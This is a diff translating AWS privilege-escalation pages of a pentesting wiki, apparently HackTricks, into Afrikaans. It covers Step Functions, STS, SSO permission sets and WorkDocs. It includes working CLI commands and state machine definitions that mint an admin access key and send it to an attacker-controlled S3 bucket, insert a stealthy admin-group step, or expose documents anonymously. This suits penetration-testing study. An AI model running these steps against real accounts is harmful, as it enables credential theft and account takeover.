 ### `sso:DetachCustomerManagedPolicyReferenceFromPermissionSet`
 
-An attacker with this permission can remove the association between a Customer managed policy from the specified permission set. It is possible to grant more privileges via **detaching a managed policy (deny policy)**.
-
+'n Aanvaller met hierdie toestemming kan die assosiasie tussen 'n kliënt bestuurde beleid en die gespesifiseerde toestemmingset verwyder. Dit is moontlik om meer voorregte toe te ken deur **'n bestuurde beleid te ontkoppel (weier beleid)**.
 ```bash
 aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn <value> --permission-set-arn <value> --customer-managed-policy-reference <value>
 ```
-
 ### `sso:DeleteInlinePolicyFromPermissionSet`
 
-An attacker with this permission can action remove the permissions from an inline policy from the permission set. It is possible to grant **more privileges via detaching an inline policy (deny policy)**.
-
+'n Aanvaller met hierdie toestemming kan die toestemmings uit 'n inline beleid van die toestemmingset verwyder. Dit is moontlik om **meer voorregte te verleen deur 'n inline beleid (weier beleid) te ontkoppel**.
 ```bash
 aws sso-admin delete-inline-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>
 ```
-
 ### `sso:DeletePermissionBoundaryFromPermissionSet`
 
-An attacker with this permission can remove the Permission Boundary from the permission set. It is possible to grant **more privileges by removing the restrictions on the Permission Set** given from the Permission Boundary.
-
+'n Aanvaller met hierdie toestemming kan die Permission Boundary uit die toestemmingstel verwyder. Dit is moontlik om **meer bevoegdhede te verleen deur die beperkings op die Permission Set** wat van die Permission Boundary gegee is, te verwyder.
 ```bash
 aws sso-admin   delete-permissions-boundary-from-permission-set --instance-arn <value> --permission-set-arn <value>
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md
index bfc3adb77..c17eef980 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md
@@ -4,73 +4,66 @@
 
 ## Step Functions
 
-For more information about this AWS service, check:
+Vir meer inligting oor hierdie AWS-diens, kyk:
 
 {{#ref}}
 ../aws-services/aws-stepfunctions-enum.md
 {{#endref}}
 
-### Task Resources
+### Taak Hulpbronne
 
-These privilege escalation techniques are going to require to use some AWS step function resources in order to perform the desired privilege escalation actions.
+Hierdie voorregverhogingstegnieke gaan vereis dat jy 'n paar AWS stapfunksie hulpbronne gebruik om die verlangde voorregverhogingsaksies uit te voer.
 
-In order to check all the possible actions, you could go to your own AWS account select the action you would like to use and see the parameters it's using, like in:
+Om al die moontlike aksies te kontroleer, kan jy na jou eie AWS-rekening gaan, die aksie kies wat jy wil gebruik en die parameters wat dit gebruik, soos in:
 
 <figure><img src="../../../images/telegram-cloud-photo-size-4-5920521132757336440-y.jpg" alt=""><figcaption></figcaption></figure>
 
-Or you could also go to the API AWS documentation and check each action docs:
+Of jy kan ook na die API AWS-dokumentasie gaan en elke aksiedokumentasie nagaan:
 
 - [**AddUserToGroup**](https://docs.aws.amazon.com/IAM/latest/APIReference/API_AddUserToGroup.html)
 - [**GetSecretValue**](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html)
 
 ### `states:TestState` & `iam:PassRole`
 
-An attacker with the **`states:TestState`** & **`iam:PassRole`** permissions can test any state and pass any IAM role to it without creating or updating an existing state machine, enabling unauthorized access to other AWS services with the roles' permissions. potentially. Combined, these permissions can lead to extensive unauthorized actions, from manipulating workflows to alter data to data breaches, resource manipulation, and privilege escalation.
-
+'n Aanvaller met die **`states:TestState`** & **`iam:PassRole`** toestemmings kan enige toestand toets en enige IAM-rol daaraan oorplaas sonder om 'n bestaande toestandsmasjien te skep of op te dateer, wat ongeoorloofde toegang tot ander AWS-dienste met die rolle se toestemmings moontlik maak. Saam kan hierdie toestemmings lei tot uitgebreide ongeoorloofde aksies, van die manipulasie van werksvloeie tot die verandering van data, datalekke, hulpbronmanipulasie en voorregverhoging.
 ```bash
 aws states test-state --definition <value> --role-arn <value> [--input <value>] [--inspection-level <value>] [--reveal-secrets | --no-reveal-secrets]
 ```
-
-The following examples show how to test an state that creates an access key for the **`admin`** user leveraging these permissions and a permissive role of the AWS environment. This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state to perform the **`iam:CreateAccessKey`** action:
+Die volgende voorbeelde wys hoe om 'n toestand te toets wat 'n toegangsleutel vir die **`admin`** gebruiker skep deur gebruik te maak van hierdie toestemmings en 'n toegeeflike rol van die AWS-omgewing. Hierdie toegeeflike rol moet enige hoë-bevoegdheid beleid geassosieer met dit hê (byvoorbeeld **`arn:aws:iam::aws:policy/AdministratorAccess`**) wat toelaat dat die toestand die **`iam:CreateAccessKey`** aksie uitvoer:
 
 - **stateDefinition.json**:
-
 ```json
 {
-  "Type": "Task",
-  "Parameters": {
-    "UserName": "admin"
-  },
-  "Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
-  "End": true
+"Type": "Task",
+"Parameters": {
+"UserName": "admin"
+},
+"Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
+"End": true
 }
 ```
-
-- **Command** executed to perform the privesc:
-
+- **Opdrag** uitgevoer om die privesc te doen:
 ```bash
 aws stepfunctions test-state --definition file://stateDefinition.json --role-arn arn:aws:iam::<account-id>:role/PermissiveRole
 
 {
-  "output": "{
-	  \"AccessKey\":{
-		  \"AccessKeyId\":\"AKIA1A2B3C4D5E6F7G8H\",
-		  \"CreateDate\":\"2024-07-09T16:59:11Z\",
-		  \"SecretAccessKey\":\"1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j\",
-		  \"Status\":\"Active\",
-		  \"UserName\":\"admin\"
-	  }
-  }",
-	"status": "SUCCEEDED"
+"output": "{
+\"AccessKey\":{
+\"AccessKeyId\":\"AKIA1A2B3C4D5E6F7G8H\",
+\"CreateDate\":\"2024-07-09T16:59:11Z\",
+\"SecretAccessKey\":\"1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j\",
+\"Status\":\"Active\",
+\"UserName\":\"admin\"
+}
+}",
+"status": "SUCCEEDED"
 }
 ```
-
-**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches.
+**Potensiële Impak**: Onbevoegde uitvoering en manipulasie van werksvloeie en toegang tot sensitiewe hulpbronne, wat moontlik kan lei tot beduidende sekuriteitsbreuke.
 
 ### `states:CreateStateMachine` & `iam:PassRole` & (`states:StartExecution` | `states:StartSyncExecution`)
 
-An attacker with the **`states:CreateStateMachine`**& **`iam:PassRole`** would be able to create an state machine and provide to it any IAM role, enabling unauthorized access to other AWS services with the roles' permissions. In contrast with the previous privesc technique (**`states:TestState`** & **`iam:PassRole`**), this one does not execute by itself, you will also need to have the **`states:StartExecution`** or **`states:StartSyncExecution`** permissions (**`states:StartSyncExecution`** is **not available for standard workflows**, **just to express state machines**) in order to start and execution over the state machine.
-
+'n Aanvaller met die **`states:CreateStateMachine`**& **`iam:PassRole`** sou in staat wees om 'n staatmasjien te skep en enige IAM-rol aan dit te verskaf, wat onbevoegde toegang tot ander AWS-dienste met die rolle se toestemmings moontlik maak. In teenstelling met die vorige privesc tegniek (**`states:TestState`** & **`iam:PassRole`**), voer hierdie een nie self uit nie; jy sal ook die **`states:StartExecution`** of **`states:StartSyncExecution`** toestemmings nodig hê (**`states:StartSyncExecution`** is **nie beskikbaar vir standaard werksvloeie nie**, **net om staatmasjiene uit te druk**) om 'n uitvoering oor die staatmasjien te begin.
 ```bash
 # Create a state machine
 aws states create-state-machine --name <value> --definition <value> --role-arn <value> [--type <STANDARD | EXPRESS>] [--logging-configuration <value>]\
@@ -82,176 +75,157 @@ aws states start-execution --state-machine-arn <value> [--name <value>] [--input
 # Start a Synchronous Express state machine execution
 aws states start-sync-execution --state-machine-arn <value> [--name <value>] [--input <value>] [--trace-header <value>]
 ```
-
-The following examples show how to create an state machine that creates an access key for the **`admin`** user and exfiltrates this access key to an attacker-controlled S3 bucket, leveraging these permissions and a permissive role of the AWS environment. This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state machine to perform the **`iam:CreateAccessKey`** & **`s3:putObject`** actions.
+Die volgende voorbeelde toon hoe om 'n toestandsmasjien te skep wat 'n toegangsleutel vir die **`admin`** gebruiker skep en hierdie toegangsleutel na 'n aanvaller-beheerde S3-bucket uit te voer, terwyl hierdie toestemmings en 'n toelaatbare rol van die AWS-omgewing benut word. Hierdie toelaatbare rol moet enige hoë-privilege beleid geassosieer met dit hê (byvoorbeeld **`arn:aws:iam::aws:policy/AdministratorAccess`**) wat die toestandsmasjien toelaat om die **`iam:CreateAccessKey`** & **`s3:putObject`** aksies uit te voer.
 
 - **stateMachineDefinition.json**:
-
 ```json
 {
-  "Comment": "Malicious state machine to create IAM access key and upload to S3",
-  "StartAt": "CreateAccessKey",
-  "States": {
-    "CreateAccessKey": {
-      "Type": "Task",
-      "Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
-      "Parameters": {
-        "UserName": "admin"
-      },
-      "ResultPath": "$.AccessKeyResult",
-      "Next": "PrepareS3PutObject"
-    },
-    "PrepareS3PutObject": {
-      "Type": "Pass",
-      "Parameters": {
-        "Body.$": "$.AccessKeyResult.AccessKey",
-        "Bucket": "attacker-controlled-S3-bucket",
-        "Key": "AccessKey.json"
-      },
-      "ResultPath": "$.S3PutObjectParams",
-      "Next": "PutObject"
-    },
-    "PutObject": {
-      "Type": "Task",
-      "Resource": "arn:aws:states:::aws-sdk:s3:putObject",
-      "Parameters": {
-        "Body.$": "$.S3PutObjectParams.Body",
-        "Bucket.$": "$.S3PutObjectParams.Bucket",
-        "Key.$": "$.S3PutObjectParams.Key"
-      },
-      "End": true
-    }
-  }
+"Comment": "Malicious state machine to create IAM access key and upload to S3",
+"StartAt": "CreateAccessKey",
+"States": {
+"CreateAccessKey": {
+"Type": "Task",
+"Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
+"Parameters": {
+"UserName": "admin"
+},
+"ResultPath": "$.AccessKeyResult",
+"Next": "PrepareS3PutObject"
+},
+"PrepareS3PutObject": {
+"Type": "Pass",
+"Parameters": {
+"Body.$": "$.AccessKeyResult.AccessKey",
+"Bucket": "attacker-controlled-S3-bucket",
+"Key": "AccessKey.json"
+},
+"ResultPath": "$.S3PutObjectParams",
+"Next": "PutObject"
+},
+"PutObject": {
+"Type": "Task",
+"Resource": "arn:aws:states:::aws-sdk:s3:putObject",
+"Parameters": {
+"Body.$": "$.S3PutObjectParams.Body",
+"Bucket.$": "$.S3PutObjectParams.Bucket",
+"Key.$": "$.S3PutObjectParams.Key"
+},
+"End": true
+}
+}
 }
 ```
-
-- **Command** executed to **create the state machine**:
-
+- **Opdrag** uitgevoer om die **toestandmasjien** te **skep**:
 ```bash
 aws stepfunctions create-state-machine --name MaliciousStateMachine --definition file://stateMachineDefinition.json --role-arn arn:aws:iam::123456789012:role/PermissiveRole
 {
-  "stateMachineArn": "arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine",
-  "creationDate": "2024-07-09T20:29:35.381000+02:00"
+"stateMachineArn": "arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine",
+"creationDate": "2024-07-09T20:29:35.381000+02:00"
 }
 ```
-
-- **Command** executed to **start an execution** of the previously created state machine:
-
+- **Opdrag** uitgevoer om **'n uitvoering** van die voorheen geskepte toestandmasjien te **begin**:
 ```json
 aws stepfunctions start-execution --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine
 {
-    "executionArn": "arn:aws:states:us-east-1:123456789012:execution:MaliciousStateMachine:1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
-    "startDate": "2024-07-09T20:33:35.466000+02:00"
+"executionArn": "arn:aws:states:us-east-1:123456789012:execution:MaliciousStateMachine:1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
+"startDate": "2024-07-09T20:33:35.466000+02:00"
 }
 ```
-
 > [!WARNING]
-> The attacker-controlled S3 bucket should have permissions to accept an s3:PutObject action from the victim account.
+> Die deur die aanvaller beheerde S3-bucket moet toestemmings hê om 'n s3:PutObject aksie van die slagoffer rekening te aanvaar.
 
-**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches.
+**Potensiële Impak**: Ongeoorloofde uitvoering en manipulasie van werksvloei en toegang tot sensitiewe hulpbronne, wat moontlik kan lei tot beduidende sekuriteitsbreuke.
 
-### `states:UpdateStateMachine` & (not always required) `iam:PassRole`
+### `states:UpdateStateMachine` & (nie altyd vereis nie) `iam:PassRole`
 
-An attacker with the **`states:UpdateStateMachine`** permission would be able to modify the definition of an state machine, being able to add extra stealthy states that could end in a privilege escalation. This way, when a legitimate user starts an execution of the state machine, this new malicious stealth state will be executed and the privilege escalation will be successful.
+'n Aanvaller met die **`states:UpdateStateMachine`** toestemming sal in staat wees om die definisie van 'n toestandsmasjien te wysig, en kan ekstra stealthy toestande byvoeg wat kan eindig in 'n privilige-escalasie. Op hierdie manier, wanneer 'n wettige gebruiker 'n uitvoering van die toestandsmasjien begin, sal hierdie nuwe kwaadwillige stealth toestand uitgevoer word en die privilige-escalasie sal suksesvol wees.
 
-Depending on how permissive is the IAM Role associated to the state machine is, an attacker would face 2 situations:
-
-1. **Permissive IAM Role**: If the IAM Role associated to the state machine is already permissive (it has for example the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached), then the **`iam:PassRole`** permission would not be required in order to escalate privileges since it would not be necessary to also update the IAM Role, with the state machine definition is enough.
-2. **Not permissive IAM Role**: In contrast with the previous case, here an attacker would also require the **`iam:PassRole`** permission since it would be necessary to associate a permissive IAM Role to the state machine in addition to modify the state machine definition.
+Afhangende van hoe permissief die IAM Rol geassosieer met die toestandsmasjien is, sal 'n aanvaller 2 situasies in die gesig staar:
 
+1. **Permissiewe IAM Rol**: As die IAM Rol geassosieer met die toestandsmasjien reeds permissief is (dit het byvoorbeeld die **`arn:aws:iam::aws:policy/AdministratorAccess`** beleid aangeheg), dan sal die **`iam:PassRole`** toestemming nie vereis word om privilige te eskaleer nie, aangesien dit nie nodig sal wees om ook die IAM Rol op te dateer nie, met die toestandsmasjien definisie is genoeg.
+2. **Nie permissiewe IAM Rol**: In teenstelling met die vorige geval, hier sal 'n aanvaller ook die **`iam:PassRole`** toestemming benodig aangesien dit nodig sal wees om 'n permissiewe IAM Rol aan die toestandsmasjien te assosieer benewens om die toestandsmasjien definisie te wysig.
 ```bash
 aws states update-state-machine --state-machine-arn <value> [--definition <value>] [--role-arn <value>] [--logging-configuration <value>] \
 [--tracing-configuration <enabled=true|false>] [--publish | --no-publish] [--version-description <value>]
 ```
-
-The following examples show how to update a legit state machine that just invokes a HelloWorld Lambda function, in order to add an extra state that adds the user **`unprivilegedUser`** to the **`administrator`** IAM Group. This way, when a legitimate user starts an execution of the updated state machine, this new malicious stealth state will be executed and the privilege escalation will be successful.
+Die volgende voorbeelde wys hoe om 'n wettige toestandsmasjien op te dateer wat net 'n HelloWorld Lambda-funksie aanroep, om 'n ekstra toestand by te voeg wat die gebruiker **`unprivilegedUser`** by die **`administrator`** IAM-groep voeg. Op hierdie manier, wanneer 'n wettige gebruiker 'n uitvoering van die opgedateerde toestandsmasjien begin, sal hierdie nuwe kwaadwillige stealth-toestand uitgevoer word en die privilige-escalasie sal suksesvol wees.
 
 > [!WARNING]
-> If the state machine does not have a permissive IAM Role associated, it would also be required the **`iam:PassRole`** permission to update the IAM Role in order to associate a permissive IAM Role (for example one with the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached).
+> As die toestandsmasjien nie 'n toelaatbare IAM-rol geassosieer het nie, sal dit ook vereis word dat die **`iam:PassRole`** toestemming gegee word om die IAM-rol op te dateer ten einde 'n toelaatbare IAM-rol te assosieer (byvoorbeeld een met die **`arn:aws:iam::aws:policy/AdministratorAccess`** beleid aangeheg).
 
 {{#tabs }}
 {{#tab name="Legit State Machine" }}
-
 ```json
 {
-  "Comment": "Hello world from Lambda state machine",
-  "StartAt": "Start PassState",
-  "States": {
-    "Start PassState": {
-      "Type": "Pass",
-      "Next": "LambdaInvoke"
-    },
-    "LambdaInvoke": {
-      "Type": "Task",
-      "Resource": "arn:aws:states:::lambda:invoke",
-      "Parameters": {
-        "FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"
-      },
-      "Next": "End PassState"
-    },
-    "End PassState": {
-      "Type": "Pass",
-      "End": true
-    }
-  }
+"Comment": "Hello world from Lambda state machine",
+"StartAt": "Start PassState",
+"States": {
+"Start PassState": {
+"Type": "Pass",
+"Next": "LambdaInvoke"
+},
+"LambdaInvoke": {
+"Type": "Task",
+"Resource": "arn:aws:states:::lambda:invoke",
+"Parameters": {
+"FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"
+},
+"Next": "End PassState"
+},
+"End PassState": {
+"Type": "Pass",
+"End": true
+}
+}
 }
 ```
-
 {{#endtab }}
 
-{{#tab name="Malicious Updated State Machine" }}
-
+{{#tab name="Kwaadwillige Opgedateerde Toestandmasjien" }}
 ```json
 {
-  "Comment": "Hello world from Lambda state machine",
-  "StartAt": "Start PassState",
-  "States": {
-    "Start PassState": {
-      "Type": "Pass",
-      "Next": "LambdaInvoke"
-    },
-    "LambdaInvoke": {
-      "Type": "Task",
-      "Resource": "arn:aws:states:::lambda:invoke",
-      "Parameters": {
-        "FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"
-      },
-      "Next": "AddUserToGroup"
-    },
-    "AddUserToGroup": {
-      "Type": "Task",
-      "Parameters": {
-        "GroupName": "administrator",
-        "UserName": "unprivilegedUser"
-      },
-      "Resource": "arn:aws:states:::aws-sdk:iam:addUserToGroup",
-      "Next": "End PassState"
-    },
-    "End PassState": {
-      "Type": "Pass",
-      "End": true
-    }
-  }
+"Comment": "Hello world from Lambda state machine",
+"StartAt": "Start PassState",
+"States": {
+"Start PassState": {
+"Type": "Pass",
+"Next": "LambdaInvoke"
+},
+"LambdaInvoke": {
+"Type": "Task",
+"Resource": "arn:aws:states:::lambda:invoke",
+"Parameters": {
+"FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"
+},
+"Next": "AddUserToGroup"
+},
+"AddUserToGroup": {
+"Type": "Task",
+"Parameters": {
+"GroupName": "administrator",
+"UserName": "unprivilegedUser"
+},
+"Resource": "arn:aws:states:::aws-sdk:iam:addUserToGroup",
+"Next": "End PassState"
+},
+"End PassState": {
+"Type": "Pass",
+"End": true
+}
+}
 }
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-- **Command** executed to **update** **the legit state machine**:
-
+- **Opdrag** uitgevoer om **die regte toestand masjien** te **opdateer**:
 ```bash
 aws stepfunctions update-state-machine --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:HelloWorldLambda --definition file://StateMachineUpdate.json
 {
-    "updateDate": "2024-07-10T20:07:10.294000+02:00",
-    "revisionId": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
+"updateDate": "2024-07-10T20:07:10.294000+02:00",
+"revisionId": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
 }
 ```
-
-**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches.
+**Potensiële Impak**: Onbevoegde uitvoering en manipulasie van werksvloeie en toegang tot sensitiewe hulpbronne, wat moontlik kan lei tot beduidende sekuriteitsbreuke.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md
index 782bcc237..80f3df177 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md
@@ -6,121 +6,101 @@
 
 ### `sts:AssumeRole`
 
-Every role is created with a **role trust policy**, this policy indicates **who can assume the created role**. If a role from the **same account** says that an account can assume it, it means that the account will be able to access the role (and potentially **privesc**).
-
-For example, the following role trust policy indicates that anyone can assume it, therefore **any user will be able to privesc** to the permissions associated with that role.
+Elke rol word geskep met 'n **rol vertrouensbeleid**, hierdie beleid dui aan **wie die geskepte rol kan aanvaar**. As 'n rol van die **dieselfde rekening** sê dat 'n rekening dit kan aanvaar, beteken dit dat die rekening toegang tot die rol sal hê (en moontlik **privesc**).
 
+Byvoorbeeld, die volgende rol vertrouensbeleid dui aan dat enigiemand dit kan aanvaar, daarom **sal enige gebruiker in staat wees om privesc** na die toestemmings wat met daardie rol geassosieer word.
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "*"
-      },
-      "Action": "sts:AssumeRole"
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": "sts:AssumeRole"
+}
+]
 }
 ```
-
-You can impersonate a role running:
-
+U kan 'n rol naboots deur te loop:
 ```bash
 aws sts assume-role --role-arn $ROLE_ARN --role-session-name sessionname
 ```
-
-**Potential Impact:** Privesc to the role.
+**Potensiële Impak:** Privesc na die rol.
 
 > [!CAUTION]
-> Note that in this case the permission `sts:AssumeRole` needs to be **indicated in the role to abuse** and not in a policy belonging to the attacker.\
-> With one exception, in order to **assume a role from a different account** the attacker account **also needs** to have the **`sts:AssumeRole`** over the role.
+> Let daarop dat in hierdie geval die toestemming `sts:AssumeRole` **aangedui moet word in die rol om te misbruik** en nie in 'n beleid wat aan die aanvaller behoort nie.\
+> Met een uitsondering, om 'n **rol van 'n ander rekening** te **aanneem**, moet die aanvaller rekening **ook** die **`sts:AssumeRole`** oor die rol hê.
 
 ### **`sts:GetFederationToken`**
 
-With this permission it's possible to generate credentials to impersonate any user:
-
+Met hierdie toestemming is dit moontlik om akrediteer te genereer om enige gebruiker na te boots:
 ```bash
 aws sts get-federation-token --name <username>
 ```
-
-This is how this permission can be given securely without giving access to impersonate other users:
-
+Dit is hoe hierdie toestemming veilig gegee kan word sonder om toegang te gee om ander gebruikers na te volg:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Sid": "VisualEditor0",
-      "Effect": "Allow",
-      "Action": "sts:GetFederationToken",
-      "Resource": "arn:aws:sts::947247140022:federated-user/${aws:username}"
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Sid": "VisualEditor0",
+"Effect": "Allow",
+"Action": "sts:GetFederationToken",
+"Resource": "arn:aws:sts::947247140022:federated-user/${aws:username}"
+}
+]
 }
 ```
-
 ### `sts:AssumeRoleWithSAML`
 
-A trust policy with this role grants **users authenticated via SAML access to impersonate the role.**
-
-An example of a trust policy with this permission is:
+'n Vertrouensbeleid met hierdie rol verleen **gebruikers wat via SAML geverifieer is toegang om die rol na te volg.**
 
+'n Voorbeeld van 'n vertrouensbeleid met hierdie toestemming is:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Sid": "OneLogin",
-      "Effect": "Allow",
-      "Principal": {
-        "Federated": "arn:aws:iam::290594632123:saml-provider/OneLogin"
-      },
-      "Action": "sts:AssumeRoleWithSAML",
-      "Condition": {
-        "StringEquals": {
-          "SAML:aud": "https://signin.aws.amazon.com/saml"
-        }
-      }
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Sid": "OneLogin",
+"Effect": "Allow",
+"Principal": {
+"Federated": "arn:aws:iam::290594632123:saml-provider/OneLogin"
+},
+"Action": "sts:AssumeRoleWithSAML",
+"Condition": {
+"StringEquals": {
+"SAML:aud": "https://signin.aws.amazon.com/saml"
+}
+}
+}
+]
 }
 ```
-
-To generate credentials to impersonate the role in general you could use something like:
-
+Om geloofsbriewe te genereer om die rol te verteenwoordig, kan jy iets soos gebruik:
 ```bash
 aws sts  assume-role-with-saml --role-arn <value> --principal-arn <value>
 ```
-
-But **providers** might have their **own tools** to make this easier, like [onelogin-aws-assume-role](https://github.com/onelogin/onelogin-python-aws-assume-role):
-
+Maar **verskaffers** mag hul **eie gereedskap** hê om dit makliker te maak, soos [onelogin-aws-assume-role](https://github.com/onelogin/onelogin-python-aws-assume-role):
 ```bash
 onelogin-aws-assume-role --onelogin-subdomain mettle --onelogin-app-id 283740 --aws-region eu-west-1 -z 3600
 ```
-
-**Potential Impact:** Privesc to the role.
+**Potensiële Impak:** Privesc na die rol.
 
 ### `sts:AssumeRoleWithWebIdentity`
 
-This permission grants permission to obtain a set of temporary security credentials for **users who have been authenticated in a mobile, web application, EKS...** with a web identity provider. [Learn more here.](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html)
-
-For example, if an **EKS service account** should be able to **impersonate an IAM role**, it will have a token in **`/var/run/secrets/eks.amazonaws.com/serviceaccount/token`** and can **assume the role and get credentials** doing something like:
+Hierdie toestemming gee toestemming om 'n stel tydelike sekuriteitsbewyse te verkry vir **gebruikers wat in 'n mobiele, webtoepassing, EKS...** geverifieer is met 'n webidentiteitsverskaffer. [Leer meer hier.](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html)
 
+Byvoorbeeld, as 'n **EKS-diensrekening** in staat moet wees om **'n IAM-rol na te volg**, sal dit 'n token in **`/var/run/secrets/eks.amazonaws.com/serviceaccount/token`** hê en kan dit **die rol aanvaar en bewys verkry** deur iets soos:
 ```bash
 aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/<role_name> --role-session-name something --web-identity-token file:///var/run/secrets/eks.amazonaws.com/serviceaccount/token
 # The role name can be found in the metadata of the configuration of the pod
 ```
-
-### Federation Abuse
+### Federasie Misbruik
 
 {{#ref}}
 ../aws-basic-information/aws-federation-abuse.md
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md
index 4b1e5e7e9..53b709c31 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md
@@ -2,7 +2,7 @@
 
 ## WorkDocs
 
-For more info about WorkDocs check:
+Vir meer inligting oor WorkDocs, kyk:
 
 {{#ref}}
 ../aws-services/aws-directory-services-workdocs-enum.md
@@ -10,17 +10,14 @@ For more info about WorkDocs check:
 
 ### `workdocs:CreateUser`
 
-Create a user inside the Directory indicated, then you will have access to both WorkDocs and AD:
-
+Skep 'n gebruiker binne die aangeduide Directory, dan sal jy toegang hê tot beide WorkDocs en AD:
 ```bash
 # Create user (created inside the AD)
 aws workdocs create-user --username testingasd --given-name testingasd --surname testingasd --password <password> --email-address name@directory.domain --organization-id <directory-id>
 ```
-
 ### `workdocs:GetDocument`, `(workdocs:`DescribeActivities`)`
 
-The files might contain sensitive information, read them:
-
+Die lêers mag sensitiewe inligting bevat, lees hulle:
 ```bash
 # Get what was created in the directory
 aws workdocs describe-activities --organization-id <directory-id>
@@ -31,26 +28,19 @@ aws workdocs describe-activities --user-id "S-1-5-21-377..."
 # Get file (a url to access with the content will be retreived)
 aws workdocs get-document --document-id <doc-id>
 ```
-
 ### `workdocs:AddResourcePermissions`
 
-If you don't have access to read something, you can just grant it
-
+As jy nie toegang het om iets te lees nie, kan jy dit eenvoudig toeken.
 ```bash
 # Add permission so anyway can see the file
 aws workdocs add-resource-permissions --resource-id <id> --principals Id=anonymous,Type=ANONYMOUS,Role=VIEWER
 ## This will give an id, the file will be acesible in: https://<name>.awsapps.com/workdocs/index.html#/share/document/<id>
 ```
-
 ### `workdocs:AddUserToGroup`
 
-You can make a user admin by setting it in the group ZOCALO_ADMIN.\
-For that follow the instructions from [https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html](https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html)
-
-Login with that user in workdoc and access the admin panel in `/workdocs/index.html#/admin`
-
-I didn't find any way to do this from the cli.
-
-
+Jy kan 'n gebruiker admin maak deur dit in die groep ZOCALO_ADMIN te stel.\
+Volg die instruksies van [https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html](https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html)
 
+Teken in met daardie gebruiker in workdoc en toegang die admin paneel in `/workdocs/index.html#/admin`
 
+Ek het nie enige manier gevind om dit vanaf die cli te doen nie.
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md
index 1519df70f..f9a9cd7a8 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md
@@ -4,7 +4,7 @@
 
 ## EventBridge Scheduler
 
-More info EventBridge Scheduler in:
+Meer inligting oor EventBridge Scheduler in:
 
 {{#ref}}
 ../aws-services/eventbridgescheduler-enum.md
